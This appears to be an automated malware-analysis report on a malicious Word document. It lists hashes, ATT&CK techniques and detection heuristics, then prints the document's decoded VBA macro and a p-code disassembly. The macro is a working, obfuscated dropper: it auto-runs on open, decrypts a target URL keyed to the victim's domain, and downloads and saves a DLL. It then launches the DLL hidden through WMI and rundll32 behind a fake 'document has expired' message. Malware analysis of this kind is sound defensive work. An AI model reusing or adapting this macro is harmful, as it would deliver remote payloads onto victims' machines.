Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 250a95582766870b…

MALICIOUS

Office (OLE)

109.5 KB
Created: 2018-05-16 17:24:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: a9bec46e46d192f2f90bf0f35b68d772
SHA-1: 412a1b0ad9fa0dd84c8efda9ebccdfd71ef80420
SHA-256: 250a95582766870b2356ae2d22a93270e9f09a878571db193e5a5f04b4fb3480
Risk Score: 538

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1055.012 Process Hollowing

The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the VBA code attempts to download and write a file to disk, likely a second-stage payload, using HTTP and then execute it via CreateRemoteThread and WriteProcessMemory. The presence of an Auto_Open macro and the use of CreateObject and Shell functions further support this malicious intent. The specific malware family could not be confidently identified.

Heuristics 15

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        dollop.Write ampleMacarons.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            Set objWMIService = GetObject(strGetObject)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        keyVar = UCase(Environ("USERDNSDOMAIN"))
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (Referenced by macro)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34349 bytes
SHA-256: a079740a3470f0b2d1e63108d66e0cf9afcfbc39714e08dd5839c6fe56ca8144
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const namePrefix = "oegaid"
Private Const nameSuffix = ".dll"

Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63

Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255

Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

Private crc32Table() As Long


Public Function Decode64(ByVal sString As String) As Byte()

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)

    lTemp = Len(sString) Mod 4
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If

    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If

    For lTemp = 0 To 255
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4
            Case 43
                bTrans(lTemp) = 62
            Case 47
                bTrans(lTemp) = 63
        End Select
    Next lTemp

    For lTemp = 0 To 63
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp

    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
        lTemp = lQuad And clHighMask
        bOut(lPos) = lTemp \ cl2Exp16
        lTemp = lQuad And clMidMask
        bOut(lPos + 1) = lTemp \ cl2Exp8
        bOut(lPos + 2) = lQuad And clLowMask
        lPos = lPos + 3
    Next lChar
    If iPad Then
        ReDim Preserve bOut(UBound(bOut) - iPad)
    End If
    Decode64 = bOut
   
End Function


Function StringToBytes(ByVal str As Variant) As Byte()
    Dim retVal() As Byte
    Dim tmp() As String
    Dim k As Integer
    tmp = Split(StrConv(str, vbUnicode), vbNullChar)
    k = UBound(tmp) - 1
    ReDim Preserve retVal(k)
    For i = 0 To (UBound(tmp) - 1)
        retVal(i) = Asc(tmp(i))
    Next
    StringToBytes = retVal
End Function


Function BytesToString(bArray As Variant) As String
    Dim i As Integer
    For i = 0 To UBound(bArray)
        BytesToString = BytesToString & Chr(bArray(i))
    Next
End Function



Private Sub Class_initialize()


    Dim dwPolynomial As Long
    dwPolynomial = &HEDB88320
    Dim i As Integer, j As Integer

    ReDim crc32Table(256)
    Dim dwCrc As Long

    For i = 0 To 255
        dwCrc = i
        For j = 8 To 1 Step -1
            If (dwCrc And 1) Then
                dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
                dwCrc = dwCrc Xor dwPolynomial
            Else
                dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
            End If
        Next j
        crc32Table(i) = dwCrc
    Next i

End Sub

Function CRC32(ByRef Buffer() As Byte) As Long
Class_initialize

Dim crc32Result As Long
crc32Result = &HFFFFFFFF
      
Dim i As Integer
Dim iLookup As Integer

For Each x In Buffer

      iLookup = (crc32Result And &HFF) Xor x
      crc32Result = ((crc32Result And &HFFFFFF00) \ &H100) _
          And 16777215
      crc32Result = crc32Result Xor crc32Table(iLookup)

Next

CRC32 = Not (crc32Result)

End Function


Function XorDecodeBytes(iKey As Variant, iMessage As Variant) As Byte()

    Dim i, j, k, iKeyIndex As Integer
    Dim iTmpKey() As Variant
    Dim cfc As Integer
        
    
    cfc = &HEE
    Dim retVal() As Byte
    
    
    k = UBound(iMessage)
    ReDim retVal(k)
    
    
    For i = 0 To UBound(iMessage)
         retVal(i) = iMessage(i)
    Next
    

    
    For i = 0 To UBound(iMessage)
        iKeyIndex = i Mod (UBound(iKey) + 1)
        j = (iKey(iKeyIndex) Xor iMessage(i)) Xor cfc
        cfc = iMessage(i)
        retVal(i) = j
    Next
    XorDecodeBytes = retVal
End Function
Function Slice1DArray(ByRef source() As Byte, ByVal start As Integer, Optional ByVal toend As Integer = -1) As Byte()
    Dim retVal() As Byte
    Dim length As Integer
    Dim i As Integer
    If toend = -1 Then
        length = UBound(source) - start
        toend = UBound(source)
    Else
        length = toend - start
    End If
    ReDim retVal(length)
    For i = start To toend
        retVal(i - start) = source(i)
    Next
    Slice1DArray = retVal

End Function



Function XorDecryptAndVerifyCRC(ByRef iKey As Variant, iMessage As Variant) As Byte()
    Dim candidate_bytes() As Byte
    Dim sPlaintext As String
    Dim bPlaintext() As Byte
    Dim crcRecoveredValue As Long
    Dim s As String
    candidate_bytes = XorDecodeBytes(iKey, iMessage)
        

    sPlaintext = BytesToString(candidate_bytes)
    On Error GoTo Error
    s = BytesToString(iKey)
    i = InStr(sPlaintext, " ")
    If i = 0 Then
        GoTo Error
    End If
    s = Left(sPlaintext, i)
    
    For j = 1 To Len(s) - 1
        c = Mid(s, j, 1)
        If InStr("-0123456789", c) = 0 Then
            GoTo Error
        End If
    Next
        
    crcRecoveredValue = CLng((Left(sPlaintext, i)))
    bPlaintext = Slice1DArray(candidate_bytes, i)
    x = CRC32(bPlaintext)
    If crcRecoveredValue = CRC32(bPlaintext) Then
        XorDecryptAndVerifyCRC = bPlaintext
        Return
    End If
Error:

End Function


Function ExpandDotString(ByVal sInput As String) As String()
    Dim retVal() As String
    Dim chunks() As String
    Dim k, i As Integer
    
    ReDim retVal(0)
    retVal(0) = sInput
    Dim current_chunk As String
    Dim last_concat As String
    k = 0
    
    
    chunks = Split(sInput, ".")
    last_concat = ""
    For i = UBound(chunks) To LBound(chunks) Step -1
        current_chunk = chunks(i)
        If last_concat = "" Then
            last_concat = current_chunk
            k = k + 1
            ReDim Preserve retVal(k)
            retVal(k) = current_chunk
            GoTo Loop1
            
        Else
            ReDim Preserve retVal(k + 2)
            retVal(k + 1) = current_chunk
            last_concat = current_chunk & "." & last_concat
            retVal(k + 2) = last_concat
            k = k + 2
        End If
Loop1:
    Next
    ExpandDotString = retVal
End Function

Function TryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
    Dim candidates() As String
    Dim c As Variant
    candidates = ExpandDotString(sInput)
    
    For Each k In sKeys
        For Each c In candidates
'
            TryAllKeys = XorDecryptAndVerifyCRC(StringToBytes(c), k)
            If (Not Not TryAllKeys) <> 0 Then
                
            
                Exit Function
            End If

        Next c
    Next k
    
    Err.Raise vbObjectError + 555, "TryAllkeys", "Master key not found :/"
End Function


Public Sub ReThrowError(ByRef objError As ErrObject)
    ' Raise
    Err.Raise objError.Number, objError.source, objError.Description, objError.HelpFile, objError.HelpContext
End Sub


Sub RunMe()
    Dim s, keyVar, sPlaintext As String
    Dim masterKey As Variant
    keyVar = UCase(Environ("USERDNSDOMAIN"))
    Dim payload As String
    payload = ""
    Dim i As Integer
   
    Dim keyScheduleBytes() As Variant
    Dim myURL As String
    Dim keySchedule(4) As String
    keySchedule(0) = "kO2U8of+kuaH8Y3px7Hb6se30qbYuZn52vCC/Q=="
    keySchedule(1) = "kOCW4Z78hfqN95b32qnX5sa5zbPWoon/0OeQ7A=="
    keySchedule(2) = "kOyH+Zjkj/OT6Yjl1a/P4NKuzbPWrpjn1v+a5Q=="
    keySchedule(3) = "kO2U8of+kuaH4538yrrB99Ow06zbu5nj1fSQ8Q=="
    keySchedule(4) = "jv6f4ZL6j/+V75zly73X+Niwzb/QqIznyO2C/Q=="
    payload = payload & "tbC04rWwsri8qaTi9OClreH5vai+ofm4/a2p6ejkv///5ra7t6mpqK6o4Oew"
    payload = payload & "5+n2pqKi8Ly4vb+wqPz3ovPqraD2sKavseW57Kyk8//vqrW16769r7HAt8W5"
    payload = payload & "iPPe9IP9s8C8nanVoN2/2ZHgy+me/7Lhvbyl"


    ReDim keyScheduleBytes(UBound(keySchedule))
    For i = 0 To UBound(keySchedule)
        keyScheduleBytes(i) = Decode64(keySchedule(i))
    Next
    
    masterKey = TryAllKeys(keyVar, keyScheduleBytes)
    ciphertext = Decode64(payload)
    bPlaintext = XorDecryptAndVerifyCRC(masterKey, ciphertext)
    sPlaintext = BytesToString(bPlaintext)
    
    zzz = sPlaintext
    Dim ampleMacarons
    Dim bStrm
    Dim filename
    Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
    ampleMacarons.Open "GET", zzz, False
    ampleMacarons.Send
    Set dollop = CreateObject(StrReverse("maertS.bdodA"))
    dollop.Type = 1
    dollop.Open
    dollop.Write ampleMacarons.responseBody
    dstPath = Environ$("TEMP") & "\" & namePrefix & "_" & DateDiff("s", #1/1/1970#, Now()) & nameSuffix
    savePath = dstPath
    dollop.savetofile savePath, 2
   
    
    Const HIDDEN_WINDOW = 0
        strComputer = "."
        abc = StrReverse("23lldnur") & " " & dstPath & ",Start"
        strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
        Set objWMIService = GetObject(strGetObject)
        Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
        objProcess.Create abc, Null, objConfig, intProcessID
   MsgBox ("This document has expired. Please contact the sender.")
    

End Sub

Sub AutoOpen()
RunMe
End Sub













Attribute VB_Name = "NewMacros"

' Processing file: /tmp/qstore_kvv_xoyp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 31481 bytes
' Line #0:
' 	Dim (Private Const) 
' 	LitStr 0x0006 "oegaid"
' 	VarDefn _B_var_Print
' Line #1:
' 	Dim (Private Const) 
' 	LitStr 0x0004 ".dll"
' 	VarDefn namePrefix
' Line #2:
' Line #3:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x00FC 
' 	VarDefn nameSuffix
' Line #4:
' 	Dim (Private Const) 
' 	LitDI4 0xF000 0x0003 
' 	VarDefn clOneMask
' Line #5:
' 	Dim (Private Const) 
' 	LitDI2 0x0FC0 
' 	VarDefn clTwoMask
' Line #6:
' 	Dim (Private Const) 
' 	LitDI2 0x003F 
' 	VarDefn clThreeMask
' Line #7:
' Line #8:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x00FF 
' 	VarDefn clFourMask
' Line #9:
' 	Dim (Private Const) 
' 	LitDI4 0xFF00 0x0000 
' 	VarDefn clHighMask
' Line #10:
' 	Dim (Private Const) 
' 	LitDI2 0x00FF 
' 	VarDefn clMidMask
' Line #11:
' Line #12:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x0004 
' 	VarDefn clLowMask
' Line #13:
' 	Dim (Private Const) 
' 	LitDI2 0x1000 
' 	VarDefn cl2Exp18
' Line #14:
' 	Dim (Private Const) 
' 	LitDI2 0x0040 
' 	VarDefn cl2Exp12
' Line #15:
' 	Dim (Private Const) 
' 	LitDI2 0x0100 
' 	VarDefn cl2Exp6
' Line #16:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x0001 
' 	VarDefn cl2Exp8
' Line #17:
' Line #18:
' 	Dim (Private) 
' 	VarDefn cl2Exp16
' Line #19:
' Line #20:
' Line #21:
' 	FuncDefn (Public Function crc32Table(ByVal Decode64 As String) As Append)
' Line #22:
' Line #23:
' 	Dim 
' 	VarDefn sString
' 	VarDefn bOut
' 	OptionBase 
' 	LitDI2 0x00FF 
' 	VarDefn bIn
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn bTrans
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn lPowers6
' Line #24:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn lPowers12
' 	VarDefn lPowers18 (As Long)
' 	VarDefn lQuad (As Integer)
' 	VarDefn iPad (As Long)
' 	VarDefn lChar (As Long)
' 	VarDefn lPos (As String)
' Line #25:
' 	Dim 
' 	VarDefn sOut (As Long)
' Line #26:
' Line #27:
' 	Ld Decode64 
' 	Ld lTemp 
' 	Ld vbNullString 
' 	ArgsLd Replace 0x0003 
' 	St Decode64 
' Line #28:
' 	Ld Decode64 
' 	Ld nodeTypedValue 
' 	Ld vbNullString 
' 	ArgsLd Replace 0x0003 
' 	St Decode64 
' Line #29:
' Line #30:
' 	Ld Decode64 
' 	FnLen 
' 	LitDI2 0x0004 
' 	Mod 
' 	St sOut 
' Line #31:
' 	Ld sOut 
' 	IfBlock 
' Line #32:
' 	Ld Raise 
' 	LitStr 0x0008 "MyDecode"
' 	LitStr 0x0021 "Input string is not valid Base64."
' 	Ld vbCr 
' 	ArgsMemCall (Call) Err 0x0003 
' Line #33:
' 	EndIfBlock 
' Line #34:
' Line #35:
' 	Ld Decode64 
' 	LitStr 0x0002 "=="
' 	ArgsLd vbObjectError 0x0002 
' 	IfBlock 
' Line #36:
' 	LitDI2 0x0002 
' 	St lQuad 
' Line #37:
' 	Ld Decode64 
' 	LitStr 0x0001 "="
' 	ArgsLd vbObjectError 0x0002 
' 	ElseIfBlock 
' Line #38:
' 	LitDI2 0x0001 
' 	St lQuad 
' Line #39:
' 	EndIfBlock 
' Line #40:
' Line #41:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #42:
' 	Ld sOut 
' 	SelectCase 
' Line #43:
' 	LitDI2 0x0041 
' 	LitDI2 0x005A 
' 	CaseTo 
' 	CaseDone 
' Line #44:
' 	Ld sOut 
' 	LitDI2 0x0041 
' 	Sub 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #45:
' 	LitDI2 0x0061 
' 	LitDI2 0x007A 
' 	CaseTo 
' 	CaseDone 
' Line #46:
' 	Ld sOut 
' 	LitDI2 0x0047 
' 	Sub 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #47:
' 	LitDI2 0x0030 
' 	LitDI2 0x0039 
' 	CaseTo 
' 	CaseDone 
' Line #48:
' 	Ld sOut 
' 	LitDI2 0x0004 
' 	Add 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #49:
' 	LitDI2 0x002B 
' 	Case 
' 	CaseDone 
' Line #50:
' 	LitDI2 0x003E 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #51:
' 	LitDI2 0x002F 
' 	Case 
' 	CaseDone 
' Line #52:
' 	LitDI2 0x003F 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #53:
' 	EndSelect 
' Line #54:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	NextVar 
' Line #55:
' Line #56:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x003F 
' 	For 
' Line #57:
' 	Ld sOut 
' 	Ld cl2Exp12 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt bTrans 0x0001 
' Line #58:
' 	Ld sOut 
' 	Ld cl2Exp18 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt lPowers6 0x0001 
' Line #59:
' 	Ld sOut 
' 	Ld clLowMask 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt lPowers12 0x0001 
' Line #60:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	NextVar 
' Line #61:
' Line #62:
' 	Ld Decode64 
' 	Ld InStrRev 
' 	ArgsLd TransformFinalBlock 0x0002 
' 	St bOut 
' Line #63:
' 	OptionBase 
' 	Ld bOut 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0004 
' 	IDiv 
' 	Paren 
' 	LitDI2 0x0003 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Sub 
' 	Redim sString 0x0001 (As Variant)
' Line #64:
' Line #65:
' 	StartForVariable 
' 	Ld iPad 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld bOut 
' 	FnUBound 0x0000 
' 	LitDI2 0x0004 
' 	ForStep 
' Line #66:
' 	LineCont 0x0004 1A 00 10 00
' 	Ld iPad 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd lPowers12 0x0001 
' 	Ld iPad 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd lPowers6 0x0001 
' 	Add 
' 	Ld iPad 
' 	LitDI2 0x0002 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd bTrans 0x0001 
' 	Add 
' 	Ld iPad 
' 	LitDI2 0x0003 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	Add 
' 	St lPowers18 
' Line #67:
' 	Ld lPowers18 
' 	Ld clFourMask 
' 	And 
' 	St sOut 
' Line #68:
' 	Ld sOut 
' 	Ld cl2Exp8 
' 	IDiv 
' 	Ld lChar 
' 	ArgsSt sString 0x0001 
' Line #69:
' 	Ld lPowers18 
' 	Ld clHighMask 
' 	And 
' 	St sOut 
' Line #70:
' 	Ld sOut 
' 	Ld cl2Exp6 
' 	IDiv 
' 	Ld lChar 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsSt sString 0x0001 
' Line #71:
' 	Ld lPowers18 
' 	Ld clMidMask 
' 	And 
' 	Ld lChar 
' 	LitDI2 0x0002 
' 	Add 
' 	ArgsSt sString 0x0001 
' Line #72:
' 	Ld lChar 
' 	LitDI2 0x0003 
' 	Add 
' 	St lChar 
' Line #73:
' 	StartForVariable 
' 	Ld iPad 
' 	EndForVariable 
' 	NextVar 
' Line #74:
' 	Ld lQuad 
' 	IfBlock 
' Line #75:
' 	OptionBase 
' 	Ld sString 
' 	FnUBound 0x0000 
' 	Ld lQuad 
' 	Sub 
' 	Redim (Preserve) sString 0x0001 (As Variant)
' Line #76:
' 	EndIfBlock 
' Line #77:
' 	Ld sString 
' 	St crc32Table 
' Line #78:
' Line #79:
' 	EndFunc 
' Line #80:
' Line #81:
' Line #82:
' 	FuncDefn (Function vbFromUnicode(ByVal StringToBytes As Variant) As Append)
' Line #83:
' 	Dim 
' 	VarDefn str
' Line #84:
' 	Dim 
' 	VarDefn retVal
' Line #85:
' 	Dim 
' 	VarDefn tmp (As Integer)
' Line #86:
' 	Ld StringToBytes 
' 	Ld StrConv 
' 	ArgsLd TransformFinalBlock 0x0002 
' 	Ld k 
' 	ArgsLd Split 0x0002 
' 	St retVal 
' Line #87:
' 	Ld retVal 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Sub 
' 	St tmp 
' Line #88:
' 	OptionBase 
' 	Ld tmp 
' 	Redim (Preserve) str 0x0001 (As Variant)
' Line #89:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld retVal 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	For 
' Line #90:
' 	Ld CreateDecryptor 
' 	ArgsLd retVal 0x0001 
' 	ArgsLd vbNullChar 0x0001 
' 	Ld CreateDecryptor 
' 	ArgsSt str 0x0001 
' Line #91:
' 	StartForVariable 
' 	Next 
' Line #92:
' 	Ld str 
' 	St vbFromUnicode 
' Line #93:
' 	EndFunc 
' Line #94:
' Line #95:
' Line #96:
' 	FuncDefn (Function Asc(BytesToString As Variant) As String)
' Line #97:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' Line #98:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld BytesToString 
' 	FnUBound 0x0000 
' 	For 
' Line #99:
' 	Ld Asc 
' 	Ld CreateDecryptor 
' 	ArgsLd BytesToString 0x0001 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St Asc 
' Line #100:
' 	StartForVariable 
' 	Next 
' Line #101:
' 	EndFunc 
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' 	FuncDefn (Sub bArray())
' Line #106:
' Line #107:
' Line #108:
' 	Dim 
' 	VarDefn Class_initialize (As Long)
' Line #109:
' 	LitHI4 0x8320 0xEDB8 
' 	St Class_initialize 
' Line #110:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' 	VarDefn dwPolynomial (As Integer)
' Line #111:
' Line #112:
' 	OptionBase 
' 	LitDI2 0x0100 
' 	Redim cl2Exp16 0x0001 (As Variant)
' Line #113:
' 	Dim 
' 	VarDefn j (As Long)
' Line #114:
' Line #115:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #116:
' 	Ld CreateDecryptor 
' 	St j 
' Line #117:
' 	StartForVariable 
' 	Ld dwPolynomial 
' 	EndForVariable 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	UMi 
' 	ForStep 
' Line #118:
' 	Ld j 
' 	LitDI2 0x0001 
' 	And 
' 	Paren 
' 	IfBlock 
' Line #119:
' 	Ld j 
' 	LitHI4 0xFFFE 0xFFFF 
' 	And 
' 	Paren 
' 	LitDI4 0x0002 0x0000 
' 	IDiv 
' 	Paren 
' 	LitHI4 0xFFFF 0x7FFF 
' 	And 
' 	St j 
' Line #120:
' 	Ld j 
' 	Ld Class_initialize 
' 	Xor 
' 	St j 
' Line #121:
' 	ElseBlock 
' Line #122:
' 	Ld j 
' 	LitHI4 0xFFFE 0xFFFF 
' 	And 
' 	Paren 
' 	LitDI4 0x0002 0x0000 
' 	IDiv 
' 	Paren 
' 	LitHI4 0xFFFF 0x7FFF 
' 	And 
' 	St j 
' Line #123:
' 	EndIfBlock 
' Line #124:
' 	StartForVariable 
' 	Ld dwPolynomial 
' 	EndForVariable 
' 	NextVar 
' Line #125:
' 	Ld j 
' 	Ld CreateDecryptor 
' 	ArgsSt cl2Exp16 0x0001 
' Line #126:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	NextVar 
' Line #127:
' Line #128:
' 	EndSub 
' Line #129:
' Line #130:
' 	FuncDefn (Function dwCrc(ByRef CRC32 As ) As Long)
' Line #131:
' 	ArgsCall bArray 0x0000 
' Line #132:
' Line #133:
' 	Dim 
' 	VarDefn Buffer (As Long)
' Line #134:
' 	LitHI4 0xFFFF 0xFFFF 
' 	St Buffer 
' Line #135:
' Line #136:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' Line #137:
' 	Dim 
' 	VarDefn crc32Result (As Integer)
' Line #138:
' Line #139:
' 	StartForVariable 
' 	Ld iLookup 
' 	EndForVariable 
' 	Ld CRC32 
' 	ForEach 
' Line #140:
' Line #141:
' 	Ld Buffer 
' 	LitHI2 0x00FF 
' 	And 
' 	Paren 
' 	Ld iLookup 
' 	Xor 
' 	St crc32Result 
' Line #142:
' 	LineCont 0x0004 0B 00 0A 00
' 	Ld Buffer 
' 	LitHI4 0xFF00 0xFFFF 
' 	And 
' 	Paren 
' 	LitHI2 0x0100 
' 	IDiv 
' 	Paren 
' 	LitDI4 0xFFFF 0x00FF 
' 	And 
' 	St Buffer 
' Line #143:
' 	Ld Buffer 
' 	Ld crc32Result 
' 	ArgsLd cl2Exp16 0x0001 
' 	Xor 
' 	St Buffer 
' Line #144:
' Line #145:
' 	StartForVariable 
' 	Next 
' Line #146:
' Line #147:
' 	Ld Buffer 
' 	Paren 
' 	Not 
' 	St dwCrc 
…